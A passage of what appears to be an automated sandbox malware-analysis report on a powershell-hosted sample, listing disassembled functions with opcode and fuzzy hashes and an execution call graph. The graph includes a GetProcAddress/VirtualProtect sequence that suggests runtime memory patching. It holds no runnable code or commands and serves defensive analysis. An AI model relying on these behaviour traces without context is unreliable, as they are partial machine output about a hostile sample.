                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e50fec9c9f54585c75284536e94e2c0ac5263203804b6af202f3048da611a8b9
                    • Instruction ID: 2e6e91d1930aac26f8651863aaaaf7c5057731ded5bd1ebd38876b06e0685265
                    • Opcode Fuzzy Hash: e50fec9c9f54585c75284536e94e2c0ac5263203804b6af202f3048da611a8b9
                    • Instruction Fuzzy Hash: CC41C279A097868FC702DB68D490B9ABFF0AF4A304F154186C884DB763D734EC15CB92
                    Function 04EAC7B8 Relevance: .1, Instructions: 92COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b44023c469bcbcb69f5d8ffdbd0cee736005822c950330026ffdad0830ff87bd
                    • Instruction ID: 45226a181d084a57922f0fcf1ee4057070d164ac97b07a38e809b46a2492907f
                    • Opcode Fuzzy Hash: b44023c469bcbcb69f5d8ffdbd0cee736005822c950330026ffdad0830ff87bd
                    • Instruction Fuzzy Hash: 65311B34B001188FCB29DB74C8516EEBBB2BF89344F1454E9D509AB361DB35AE95CF81
                    Function 04EA45B0 Relevance: .1, Instructions: 70COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ab55e502ec2343cc2265236914507fa48a96cda7e88149229d3b91e350fec02d
                    • Instruction ID: 5a79a1f48cce3ba8a949ab6296067e534d57c3c047bad901313e9282d41c8aa0
                    • Opcode Fuzzy Hash: ab55e502ec2343cc2265236914507fa48a96cda7e88149229d3b91e350fec02d
                    • Instruction Fuzzy Hash: AA21F374A00609DFCB05CF99C5809AAFBB2FF89310B158599E909EB751C735FC51CBA0
                    Function 04EA39D8 Relevance: .1, Instructions: 69COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a1e0cf4f0276fec935b852d7c1891e39b316aad6cf4cb661c6946f5cb6ac4668
                    • Instruction ID: b55da0ee6aba87fcbab1c6b02a933a6d3980a5b6e8acf8c693386f3e5c8a17f8
                    • Opcode Fuzzy Hash: a1e0cf4f0276fec935b852d7c1891e39b316aad6cf4cb661c6946f5cb6ac4668
                    • Instruction Fuzzy Hash: 95213AB4A04219DFCB10DF58D890AAEBBB0FF89300B15819AD949EB352D735FC51CBA1
                    Function 07BE1D7F Relevance: .0, Instructions: 36COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4eeeecc70c663cd62a5e9169aee3dffdbcfa26a0a8920bcf7aa9d925260bb5d5
                    • Instruction ID: 2d9d7f7d6b1e97e85c5ef87b2524a3bd5b891a10e2e48fb1dd4bdab7840dd44c
                    • Opcode Fuzzy Hash: 4eeeecc70c663cd62a5e9169aee3dffdbcfa26a0a8920bcf7aa9d925260bb5d5
                    • Instruction Fuzzy Hash: C2F046B710C1C94BE7038AA8A860AA2FF64AF93230728C2DBD0954F393E6314016DB41
                    Function 07BE4328 Relevance: .0, Instructions: 19COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ff21634bc8f69f17d23d2bd5b130c70267294e37396f98701cdf0742afa6edd9
                    • Instruction ID: e819a17d09907fb79c6f4b388a729303fb137a370d58c353d58a5d5b3bad037b
                    • Opcode Fuzzy Hash: ff21634bc8f69f17d23d2bd5b130c70267294e37396f98701cdf0742afa6edd9
                    • Instruction Fuzzy Hash: 32E086F5200147CBFB10CA04C844A15F365FBC0219F2CC0EAA0190F2A5C736D442C715

                    Non-executed Functions

                    Function 07BE7508 Relevance: 10.3, Strings: 8, Instructions: 305COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (fbl$(fbl$(fbl$(fbl$(fbl$(fbl$(fbl$(fbl
                    • API String ID: 0-3384489963
                    • Opcode ID: dee9a00b33eb70fab86891e2f0d7a9066bce8df71d1994879f3cd206dab18a0e
                    • Instruction ID: 46ecbc704a5de0f9e71475a93e29f796d43a59ba3707eb43d9aafa8a4eb4031e
                    • Opcode Fuzzy Hash: dee9a00b33eb70fab86891e2f0d7a9066bce8df71d1994879f3cd206dab18a0e
                    • Instruction Fuzzy Hash: E0C16CF0E00205DBEB248FA8C851A6AB7F6EF85314F1485A9D9169BB44DF36EC41CF91
                    Function 07BE0BB0 Relevance: 5.4, Strings: 4, Instructions: 408COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 84`l$84`l$84`l$84`l
                    • API String ID: 0-2043871387
                    • Opcode ID: f6252504e7a608433344949411a02f112b985784c16d0e8b7ba52d9f20cadac0
                    • Instruction ID: c987145c95945eaebd3fc8243b481201108ab797d1dd3b0d3715ca77f23c1649
                    • Opcode Fuzzy Hash: f6252504e7a608433344949411a02f112b985784c16d0e8b7ba52d9f20cadac0
                    • Instruction Fuzzy Hash: 93E190B1B00219DFEB28DF58C454AAEBBB6FF89310F2480A5E9059B355CBB1DC41CB91
                    Function 07BEF0E8 Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (fbl$(fbl$x.Sk$-Sk
                    • API String ID: 0-247111407
                    • Opcode ID: ce68b878b3978f088ef5c93677b105eabf153cbf3129929d73f5414939331a74
                    • Instruction ID: 5d03e0212af70d9c1f80639584556c96a0fc69432702c3bf7443d6baaa726470
                    • Opcode Fuzzy Hash: ce68b878b3978f088ef5c93677b105eabf153cbf3129929d73f5414939331a74
                    • Instruction Fuzzy Hash: 60C179B1A00205DFEB24CF54D851BAEB7F6EF89704F148469D9152B754CB36E842CF91
                    Function 07BE74E2 Relevance: 5.3, Strings: 4, Instructions: 266COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (fbl$(fbl$(fbl$(fbl
                    • API String ID: 0-3980633156
                    • Opcode ID: 98c6d0c823a8634188225a117352fe562a7cdedc2458294238616e67823827a9
                    • Instruction ID: c2b25e279cf11436e3a4dd6faac53a503647b3f79d374c6990e079875d8fe205
                    • Opcode Fuzzy Hash: 98c6d0c823a8634188225a117352fe562a7cdedc2458294238616e67823827a9
                    • Instruction Fuzzy Hash: DBA16AF1E01202DFEB20CF95C851AAAB7F6EF85314F1885AAD8556B714DB32A841CF91
                    Function 07BE8F70 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (fbl$(fbl$(fbl$(fbl
                    • API String ID: 0-3980633156
                    • Opcode ID: a05a293e5d496334cf7271d590170dddc8bb289c99ae2b90ddfbd69638635ff1
                    • Instruction ID: d3d2f0b2e67cfcc4ba3c882d6681607062d42a39b2ac8671df3adf62d569980d
                    • Opcode Fuzzy Hash: a05a293e5d496334cf7271d590170dddc8bb289c99ae2b90ddfbd69638635ff1
                    • Instruction Fuzzy Hash: 3E715FB0A00205EFEB14CF58C455AAEB7F6EF89310F1481A9D815AB755CB36EC45CF92

                    Execution Graph

                    Execution Coverage:3.6%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:2.8%
                    Total number of Nodes:1570
                    Total number of Limit Nodes:11
                    execution_graph 7662 21363eb3 7665 21365411 7662->7665 7666 2136541d _abort 7665->7666 7667 21365af6 _abort 38 API calls 7666->7667 7670 21365422 7667->7670 7668 213655a8 _abort 38 API calls 7669 2136544c 7668->7669 7670->7668 6443 21363370 6454 21363330 6443->6454 6455 21363342 6454->6455 6456 2136334f 6454->6456 6457 21362ada _ValidateLocalCookies 5 API calls 6455->6457 6457->6456 7035 213663f0 7036 21366400 7035->7036 7045 21366416 7035->7045 7037 21366368 _free 20 API calls 7036->7037 7038 21366405 7037->7038 7039 213662ac _abort 26 API calls 7038->7039 7041 2136640f 7039->7041 7042 21366480 7042->7042 7065 21364e76 7042->7065 7043 213664ee 7047 2136571e _free 20 API calls 7043->7047 7045->7042 7048 21366561 7045->7048 7054 21366580 7045->7054 7046 213664e5 7046->7043 7051 21366573 7046->7051 7071 213685eb 7046->7071 7047->7048 7080 2136679a 7048->7080 7052 213662bc _abort 11 API calls 7051->7052 7053 2136657f 7052->7053 7055 2136658c 7054->7055 7055->7055 7056 2136637b _abort 20 API calls 7055->7056 7057 213665ba 7056->7057 7058 213685eb 26 API calls 7057->7058 7059 213665e6 7058->7059 7060 213662bc _abort 11 API calls 7059->7060 7061 21366615 ___scrt_fastfail 7060->7061 7062 213666b6 FindFirstFileExA 7061->7062 7063 21366705 7062->7063 7064 21366580 26 API calls 7063->7064 7066 21364e8b 7065->7066 7067 21364e87 7065->7067 7066->7067 7068 2136637b _abort 20 API calls 7066->7068 7067->7046 7069 21364eb9 7068->7069 7070 2136571e _free 20 API calls 7069->7070 7070->7067 7072 2136853a 7071->7072 7075 2136854f 7072->7075 7077 21368554 7072->7077 7078 2136858b 7072->7078 7073 21366368 _free 20 API calls 7074 2136857a 7073->7074 7076 213662ac _abort 26 API calls 7074->7076 7075->7073 7075->7077 7076->7077 7077->7046 7078->7077 7079 21366368 _free 20 API calls 7078->7079 7079->7074 7081 213667a4 7080->7081 7082 213667b4 7081->7082 7083 2136571e _free 20 API calls 7081->7083 7084 2136571e _free 20 API calls 7082->7084 7083->7081 7085 213667bb 7084->7085 7085->7041 7417 21365630 7418 2136563b 7417->7418 7419 21365eb7 11 API calls 7418->7419 7420 21365664 7418->7420 7421 21365660 7418->7421 7419->7418 7423 21365688 7420->7423 7424 213656b4 7423->7424 7425 21365695 7423->7425 7424->7421 7426 2136569f RtlDeleteCriticalSection 7425->7426 7426->7424 7426->7426 7476 21369e71 7477 21369e95 7476->7477 7478 21369ee6 7477->7478 7480 21369f71 __startOneArgErrorHandling 7477->7480 7479 2136aa53 21 API calls 7478->7479 7482 21369ef8 7478->7482 7479->7482 7481 2136acad __startOneArgErrorHandling 7480->7481 7484 2136b2f0 7480->7484 7485 2136b329 __startOneArgErrorHandling 7484->7485 7486 2136b5c1 __raise_exc RaiseException 7485->7486 7487 2136b350 __startOneArgErrorHandling 7485->7487 7486->7487 7488 2136b393 7487->7488 7489 2136b36e 7487->7489 7490 2136b8b2 __startOneArgErrorHandling 20 API calls 7488->7490 7495 2136b8e1 7489->7495 7492 2136b38e __startOneArgErrorHandling 7490->7492 7493 21362ada _ValidateLocalCookies 5 API calls 7492->7493 7494 2136b3b7 7493->7494 7494->7481 7496 2136b8f0 7495->7496 7497 2136b964 __startOneArgErrorHandling 7496->7497 7498 2136b90f __startOneArgErrorHandling 7496->7498 7500 2136b8b2 __startOneArgErrorHandling 20 API calls 7497->7500 7499 213678a3 __startOneArgErrorHandling 5 API calls 7498->7499 7501 2136b950 7499->7501 7502 2136b95d 7500->7502 7501->7502 7503 2136b8b2 __startOneArgErrorHandling 20 API calls 7501->7503 7502->7492 7503->7502 5863 21361f3f 5864 21361f4b ___scrt_is_nonwritable_in_current_image 5863->5864 5881 2136247c 5864->5881 5866 21361f52 5867 21362041 5866->5867 5868 21361f7c 5866->5868 5875 21361f57 ___scrt_is_nonwritable_in_current_image 5866->5875 5908 21362639 IsProcessorFeaturePresent 5867->5908 5892 213623de 5868->5892 5871 21362048 5872 21361f8b __RTC_Initialize 5872->5875 5895 213622fc RtlInitializeSListHead 5872->5895 5874 21361f99 ___scrt_initialize_default_local_stdio_options 5896 213646c5 5874->5896 5879 21361fb8 5879->5875 5904 21364669 5879->5904 5882 21362485 5881->5882 5912 21362933 IsProcessorFeaturePresent 5882->5912 5886 21362496 5891 2136249a 5886->5891 5923 213653c8 5886->5923 5889 213624b1 5889->5866 5891->5866 6012 213624b5 5892->6012 5894 213623e5 5894->5872 5895->5874 5899 213646dc 5896->5899 5897 21362ada _ValidateLocalCookies 5 API calls 5898 21361fad 5897->5898 5898->5875 5900 213623b3 5898->5900 5899->5897 5901 213623b8 ___scrt_release_startup_lock 5900->5901 5902 21362933 ___isa_available_init IsProcessorFeaturePresent 5901->5902 5903 213623c1 5901->5903 5902->5903 5903->5879 5905 21364698 5904->5905 5906 21362ada _ValidateLocalCookies 5 API calls 5905->5906 5907 213646c1 5906->5907 5907->5875 5909 2136264e ___scrt_fastfail 5908->5909 5910 213626f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5909->5910 5911 21362744 ___scrt_fastfail 5910->5911 5911->5871 5913 21362491 5912->5913 5914 213634ea 5913->5914 5915 213634ef ___vcrt_initialize_winapi_thunks 5914->5915 5934 21363936 5915->5934 5919 21363510 5919->5886 5920 21363505 5920->5919 5948 21363972 5920->5948 5922 213634fd 5922->5886 5989 21367457 5923->5989 5926 21363529 5927 21363532 5926->5927 5933 21363543 5926->5933 5928 2136391b ___vcrt_uninitialize_ptd 6 API calls 5927->5928 5929 21363537 5928->5929 5930 21363972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 5929->5930 5931 2136353c 5930->5931 6008 21363c50 5931->6008 5933->5891 5935 2136393f 5934->5935 5937 21363968 5935->5937 5938 213634f9 5935->5938 5952 21363be0 5935->5952 5939 21363972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 5937->5939 5938->5922 5940 213638e8 5938->5940 5939->5938 5970 21363af1 5940->5970 5943 213638fd 5943->5920 5946 21363918 5946->5920 5949 2136399c 5948->5949 5950 2136397d 5948->5950 5949->5922 5951 21363987 RtlDeleteCriticalSection 5950->5951 5951->5949 5951->5951 5957 21363a82 5952->5957 5954 21363bfa 5955 21363c18 InitializeCriticalSectionAndSpinCount 5954->5955 5956 21363c03 5954->5956 5955->5956 5956->5935 5958 21363aa6 __crt_fast_encode_pointer 5957->5958 5959 21363aaa 5957->5959 5958->5954 5959->5958 5963 213639be 5959->5963 5962 21363ac4 GetProcAddress 5962->5958 5967 213639cd try_get_first_available_module 5963->5967 5964 213639ea LoadLibraryExW 5965 21363a05 GetLastError 5964->5965 5964->5967 5965->5967 5966 21363a60 FreeLibrary 5966->5967 5967->5964 5967->5966 5968 21363a77 5967->5968 5969 21363a38 LoadLibraryExW 5967->5969 5968->5958 5968->5962 5969->5967 5971 21363a82 try_get_function 5 API calls 5970->5971 5972 21363b0b 5971->5972 5973 21363b24 TlsAlloc 5972->5973 5974 213638f2 5972->5974 5974->5943 5975 21363ba2 5974->5975 5976 21363a82 try_get_function 5 API calls 5975->5976 5977 21363bbc 5976->5977 5978 21363bd7 TlsSetValue 5977->5978 5979 2136390b 5977->5979 5978->5979 5979->5946 5980 2136391b 5979->5980 5981 21363925 5980->5981 5982 2136392b 5980->5982 5984 21363b2c 5981->5984 5982->5943 5985 21363a82 try_get_function 5 API calls 5984->5985 5986 21363b46 5985->5986 5987 21363b5e TlsFree 5986->5987 5988 21363b52 5986->5988 5987->5988 5988->5982 5990 21367474 5989->5990 5993 21367470 5989->5993 5990->5993 5995 2136731f 5990->5995 5992 213624a3 5992->5889 5992->5926 6000 21362ada 5993->6000 5998 21367326 5995->5998 5996 21367369 GetStdHandle 5996->5998 5997 213673d1 5997->5990 5998->5996 5998->5997 5999 2136737c GetFileType 5998->5999 5999->5998 6001 21362ae5 IsProcessorFeaturePresent 6000->6001 6002 21362ae3 6000->6002 6004 21362b58 6001->6004 6002->5992 6007 21362b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6004->6007 6006 21362c3b 6006->5992 6007->6006 6009 21363c59 6008->6009 6011 21363c7f 6008->6011 6010 21363c69 FreeLibrary 6009->6010 6009->6011 6010->6009 6011->5933 6013 213624c4 6012->6013 6014 213624c8 6012->6014 6013->5894 6015 213624d5 ___scrt_release_startup_lock 6014->6015 6016 21362639 ___scrt_fastfail 4 API calls 6014->6016 6015->5894 6017 21362559 6016->6017 6956 213667bf 6961 213667f4 6956->6961 6959 213667db 6960 2136571e _free 20 API calls 6960->6959 6962 21366806 6961->6962 6963 213667cd 6961->6963 6964 21366836 6962->6964 6965 2136680b 6962->6965 6963->6959 6963->6960 6964->6963 6972 213671d6 6964->6972 6966 2136637b _abort 20 API calls 6965->6966 6968 21366814 6966->6968 6969 2136571e _free 20 API calls 6968->6969 6969->6963 6970 21366851 6971 2136571e _free 20 API calls 6970->6971 6971->6963 6973 213671e1 6972->6973 6974 21367209 6973->6974 6975 213671fa 6973->6975 6979 21367218 6974->6979 6981 21368a98 6974->6981 6976 21366368 _free 20 API calls 6975->6976 6980 213671ff ___scrt_fastfail 6976->6980 6988 21368acb 6979->6988 6980->6970 6982 21368aa3 6981->6982 6983 21368ab8 RtlSizeHeap 6981->6983 6984 21366368 _free 20 API calls 6982->6984 6983->6979 6985 21368aa8 6984->6985 6986 213662ac _abort 26 API calls 6985->6986 6987 21368ab3 6986->6987 6987->6979 6989 21368ae3 6988->6989 6990 21368ad8 6988->6990 6991 21368aeb 6989->6991 6999 21368af4 _abort 6989->6999 7000 213656d0 6990->7000 6993 2136571e _free 20 API calls 6991->6993 6996 21368ae0 6993->6996 6994 21368b1e RtlReAllocateHeap 6994->6996 6994->6999 6995 21368af9 6997 21366368 _free 20 API calls 6995->6997 6996->6980 6997->6996 6998 2136474f _abort 7 API calls 6998->6999 6999->6994 6999->6995 6999->6998 7001 2136570e 7000->7001 7005 213656de _abort 7000->7005 7003 21366368 _free 20 API calls 7001->7003 7002 213656f9 RtlAllocateHeap 7004 2136570c 7002->7004 7002->7005 7003->7004 7004->6996 7005->7001 7005->7002 7006 2136474f _abort 7 API calls 7005->7006 7006->7005 7086 21365bff 7094 21365d5c 7086->7094 7089 21365c13 7090 21365b7a _abort 20 API calls 7091 21365c1b 7090->7091 7092 21365c28 7091->7092 7101 21365c2b 7091->7101 7095 21365c45 _abort 5 API calls 7094->7095 7096 21365d83 7095->7096 7097 21365d9b TlsAlloc 7096->7097 7098 21365d8c 7096->7098 7097->7098 7099 21362ada _ValidateLocalCookies 5 API calls 7098->7099 7100 21365c09 7099->7100 7100->7089 7100->7090 7102 21365c35 7101->7102 7103 21365c3b 7101->7103 7105 21365db2 7102->7105 7103->7089 7106 21365c45 _abort 5 API calls 7105->7106 7107 21365dd9 7106->7107 7108 21365df1 TlsFree 7107->7108 7109 21365de5 7107->7109 7108->7109 7110 21362ada _ValidateLocalCookies 5 API calls 7109->7110 7111 21365e02 7110->7111 7111->7103 7427 2136543d 7428 21365440 7427->7428 7429 213655a8 _abort 38 API calls 7428->7429 7430 2136544c 7429->7430 7007 21369db8 7008 21369dbf 7007->7008 7009 21369e20 7008->7009 7013 21369ddf 7008->7013 7010 2136aa17 21 API calls 7009->7010 7011 2136a90e 7009->7011 7012 21369e6e 7010->7012 7013->7011 7014 2136aa17 21 API calls 7013->7014 7015 2136a93e 7014->7015 5831 2136c7a7 5832 2136c7be 5831->5832 5838 2136c82c 5831->5838 5832->5838 5843 2136c7e6 GetModuleHandleA 5832->5843 5834 2136c835 GetModuleHandleA 5836 2136c83f 5834->5836 5835 2136c872 5836->5836 5836->5838 5839 2136c85f GetProcAddress 5836->5839 5837 2136c7dd 5837->5836 5837->5838 5840 2136c800 GetProcAddress 5837->5840 5838->5834 5838->5835 5838->5836 5839->5838 5840->5838 5841 2136c80d VirtualProtect 5840->5841 5841->5838 5842 2136c81c VirtualProtect 5841->5842 5842->5838 5844 2136c7ef 5843->5844 5845 2136c82c 5843->5845 5855 2136c803 GetProcAddress 5844->5855 5847 2136c835 GetModuleHandleA 5845->5847 5848 2136c872 5845->5848 5854 2136c83f 5845->5854 5847->5854 5849 2136c7f4 5849->5845 5850 2136c800 GetProcAddress 5849->5850 5850->5845 5851 2136c80d VirtualProtect 5850->5851 5851->5845 5852 2136c81c VirtualProtect 5851->5852 5852->5845 5853 2136c85f GetProcAddress 5853->5845 5854->5845 5854->5853 5856 2136c82c 5855->5856 5857 2136c80d VirtualProtect 5855->5857 5859 2136c835 GetModuleHandleA 5856->5859 5860 2136c872 5856->5860 5857->5856 5858 2136c81c VirtualProtect 5857->5858 5858->5856 5861 2136c83f 5859->5861 5861->5856 5862 2136c85f GetProcAddress 5861->5862 5862->5861 7016 213681a0 7017 213681d9 7016->7017 7018 213681dd 7017->7018 7029 21368205 7017->7029 7019 21366368 _free 20 API calls 7018->7019 7021 213681e2 7019->7021 7020 21368529 7023 21362ada _ValidateLocalCookies 5 API calls 7020->7023 7022 213662ac _abort 26 API calls 7021->7022 7024 213681ed 7022->7024 7025 21368536 7023->7025 7026 21362ada _ValidateLocalCookies 5 API calls 7024->7026 7027 213681f9 7026->7027 7029->7020 7030 213680c0 7029->7030 7033 213680db 7030->7033 7031 21362ada _ValidateLocalCookies 5 API calls 7032 21368152 7031->7032 7032->7029 7033->7031 7112 2136a1e0 7115 2136a1fe 7112->7115 7114 2136a1f6 7119 2136a203 7115->7119 7118 2136a298 7118->7114 7119->7118 7120 2136aa53 7119->7120 7121 2136aa70 RtlDecodePointer 7120->7121 7122 2136aa80 7120->7122 7121->7122 7125 2136ab0d 7122->7125 7126 2136ab02 7122->7126 7128 2136aab7 7122->7128 7123 21362ada _ValidateLocalCookies 5 API calls 7124 2136a42f 7123->7124 7124->7114 7125->7126 7127 21366368 _free 20 API calls 7125->7127 7126->7123 7127->7126 7128->7126 7129 21366368 _free 20 API calls 7128->7129 7129->7126 7034 213621a1 ___scrt_dllmain_exception_filter 7504 2136506f 7505 21365081 7504->7505 7506 21365087 7504->7506 7507 21365000 20 API calls 7505->7507 7507->7506 7675 213660ac 7676 213660dd 7675->7676 7678 213660b7 7675->7678 7677 213660c7 FreeLibrary 7677->7678 7678->7676 7678->7677 7431 2136742b 7432 21367430 7431->7432 7433 21367453 7432->7433 7435 21368bae 7432->7435 7436 21368bbb 7435->7436 7440 21368bdd 7435->7440 7437 21368bd7 7436->7437 7438 21368bc9 RtlDeleteCriticalSection 7436->7438 7439 2136571e _free 20 API calls 7437->7439 7438->7437 7438->7438 7439->7440 7440->7432 7508 2136ac6b 7509 2136ac84 __startOneArgErrorHandling 7508->7509 7510 2136b2f0 21 API calls 7509->7510 7511 2136acad __startOneArgErrorHandling 7509->7511 7510->7511 7703 21364ed7 7704 21366d60 51 API calls 7703->7704 7705 21364ee9 7704->7705 7714 21367153 GetEnvironmentStringsW 7705->7714 7709 2136571e _free 20 API calls 7710 21364f29 7709->7710 7711 2136571e _free 20 API calls 7713 21364ef4 7711->7713 7712 21364eff 7712->7711 7713->7709 7715 2136716a 7714->7715 7725 213671bd 7714->7725 7716 21367170 WideCharToMultiByte 7715->7716 7719 2136718c 7716->7719 7716->7725 7717 213671c6 FreeEnvironmentStringsW 7718 21364eee 7717->7718 7718->7713 7726 21364f2f 7718->7726 7720 213656d0 21 API calls 7719->7720 7721 21367192 7720->7721 7722 21367199 WideCharToMultiByte 7721->7722 7723 213671af 7721->7723 7722->7723 7724 2136571e _free 20 API calls 7723->7724 7724->7725 7725->7717 7725->7718 7727 21364f44 7726->7727 7728 2136637b _abort 20 API calls 7727->7728 7737 21364f6b 7728->7737 7729 21364fcf 7730 2136571e _free 20 API calls 7729->7730 7731 21364fe9 7730->7731 7731->7712 7732 2136637b _abort 20 API calls 7732->7737 7733 21364fd1 7734 21365000 20 API calls 7733->7734 7736 21364fd7 7734->7736 7735 2136544d ___std_exception_copy 26 API calls 7735->7737 7739 2136571e _free 20 API calls 7736->7739 7737->7729 7737->7732 7737->7733 7737->7735 7738 21364ff3 7737->7738 7741 2136571e _free 20 API calls 7737->7741 7740 213662bc _abort 11 API calls 7738->7740 7739->7729 7742 21364fff 7740->7742 7741->7737 7130 213673d5 7131 213673e1 ___scrt_is_nonwritable_in_current_image 7130->7131 7142 21365671 RtlEnterCriticalSection 7131->7142 7133 213673e8 7143 21368be3 7133->7143 7135 213673f7 7141 21367406 7135->7141 7156 21367269 GetStartupInfoW 7135->7156 7138 21367417 _abort 7140 2136731f 2 API calls 7140->7141 7162 21367422 7141->7162 7142->7133 7144 21368bef ___scrt_is_nonwritable_in_current_image 7143->7144 7145 21368c13 7144->7145 7146 21368bfc 7144->7146 7165 21365671 RtlEnterCriticalSection 7145->7165 7148 21366368 _free 20 API calls 7146->7148 7149 21368c01 7148->7149 7150 213662ac _abort 26 API calls 7149->7150 7151 21368c0b _abort 7150->7151 7151->7135 7152 21368c4b 7173 21368c72 7152->7173 7153 21368c1f 7153->7152 7166 21368b34 7153->7166 7157 21367286 7156->7157 7158 21367318 7156->7158 7157->7158 7159 21368be3 27 API calls 7157->7159 7158->7140 7160 213672af 7159->7160 7160->7158 7161 213672dd GetFileType 7160->7161 7161->7160 7184 213656b9 RtlLeaveCriticalSection 7162->7184 7164 21367429 7164->7138 7165->7153 7167 2136637b _abort 20 API calls 7166->7167 7168 21368b46 7167->7168 7172 21368b53 7168->7172 7176 21365eb7 7168->7176 7169 2136571e _free 20 API calls 7171 21368ba5 7169->7171 7171->7153 7172->7169 7183 213656b9 RtlLeaveCriticalSection 7173->7183 7175 21368c79 7175->7151 7177 21365c45 _abort 5 API calls 7176->7177 7178 21365ede 7177->7178 7179 21365efc InitializeCriticalSectionAndSpinCount 7178->7179 7180 21365ee7 7178->7180 7179->7180 7181 21362ada _ValidateLocalCookies 5 API calls 7180->7181 7182 21365f13 7181->7182 7182->7168 7183->7175 7184->7164 7679 21363c90 RtlUnwind 7743 213636d0 7744 213636e2 7743->7744 7746 213636f0 @_EH4_CallFilterFunc@8 7743->7746 7745 21362ada _ValidateLocalCookies 5 API calls 7744->7745 7745->7746 6458 21365351 6459 21365360 6458->6459 6460 21365374 6458->6460 6459->6460 6462 2136571e _free 20 API calls 6459->6462 6461 2136571e _free 20 API calls 6460->6461 6463 21365386 6461->6463 6462->6460 6464 2136571e _free 20 API calls 6463->6464 6465 21365399 6464->6465 6466 2136571e _free 20 API calls 6465->6466 6467 213653aa 6466->6467 6468 2136571e _free 20 API calls 6467->6468 6469 213653bb 6468->6469 7441 2136281c 7444 21362882 7441->7444 7447 21363550 7444->7447 7446 2136282a 7448 2136355d 7447->7448 7452 2136358a 7447->7452 7449 213647e5 ___std_exception_copy 21 API calls 7448->7449 7448->7452 7450 2136357a 7449->7450 7450->7452 7453 2136544d 7450->7453 7452->7446 7454 2136545a 7453->7454 7455 21365468 7453->7455 7454->7455 7458 2136547f 7454->7458 7456 21366368 _free 20 API calls 7455->7456 7461 21365470 7456->7461 7457 213662ac _abort 26 API calls 7459 2136547a 7457->7459 7458->7459 7460 21366368 _free 20 API calls 7458->7460 7459->7452 7460->7461 7461->7457 7185 21364bdd 7186 21364bec 7185->7186 7187 21364c08 7185->7187 7186->7187 7188 21364bf2 7186->7188 7208 21366d60 7187->7208 7190 21366368 _free 20 API calls 7188->7190 7192 21364bf7 7190->7192 7194 213662ac _abort 26 API calls 7192->7194 7193 21364c33 7212 21364d01 7193->7212 7195 21364c01 7194->7195 7198 21364e76 20 API calls 7199 21364c5d 7198->7199 7200 21364c66 7199->7200 7201 21364c72 7199->7201 7202 21366368 _free 20 API calls 7200->7202 7203 21364d01 38 API calls 7201->7203 7207 21364c6b 7202->7207 7205 21364c88 7203->7205 7204 2136571e _free 20 API calls 7204->7195 7206 2136571e _free 20 API calls 7205->7206 7205->7207 7206->7207 7207->7204 7209 